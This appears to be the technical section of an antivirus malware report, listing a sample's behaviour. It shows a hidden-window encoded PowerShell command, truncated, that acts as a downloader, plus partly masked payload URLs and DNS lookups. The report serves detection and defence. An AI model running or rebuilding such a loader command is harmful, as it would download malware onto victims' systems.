Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAEoAUgBCAEwAdwBvAHYAPQAnAE0ASABWAEEAUgBnAHYAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBDAHUAcgBpAGAAVABZAHAAYABSAE8AVABvAGMATwBMACIAIAA9AC...
- http://co###ompany.com/rs-plugin/k7258713/
- http://www.co###gweb.com/cgi-bin/Hr6uN/
- http://e-####ine.com.br/mailer/9VbMB04/
- http://do##hop.gr/upgrades/x4e50/
- http://www.do##hop.gr/upgrades/x4e50/
- DNS ASK co###ompany.com
- DNS ASK gu######ge.dothome.co.kr
- DNS ASK co###gweb.com
- DNS ASK dm##eak.com
- DNS ASK e-####ine.com.br
- DNS ASK do##hop.gr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAEoAUgBCAEwAdwBvAHYAPQAnAE0ASABWAEEAUgBnAHYAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBDAHUAcgBpAGAAVABZAHAAYABSAE8AVABvAGMATwBMACIAIAA9AC...' (со скрытым окном)